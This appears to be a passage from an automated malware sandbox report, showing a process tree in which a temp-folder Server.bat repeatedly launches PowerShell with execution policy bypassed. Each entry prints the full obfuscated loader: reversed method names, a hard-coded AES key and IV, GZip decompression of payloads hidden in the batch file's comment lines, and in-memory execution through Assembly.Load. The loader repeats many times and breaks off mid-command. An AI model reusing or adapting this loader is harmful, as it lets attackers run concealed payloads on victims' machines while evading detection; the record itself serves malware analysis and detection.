$dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        73⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1868
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        71⤵
        
        PID:2364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        72⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        70⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        71⤵
        
        PID:1908
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        69⤵
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        70⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2104
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        68⤵
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        69⤵
        
        PID:2340
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        67⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        68⤵
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        66⤵
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        67⤵
        
        PID:2064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        65⤵
        
        PID:956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        66⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        64⤵
        
        PID:2184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        65⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        63⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        64⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        62⤵
        
        PID:1864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        63⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        61⤵
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        62⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        60⤵
        
        PID:2704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join 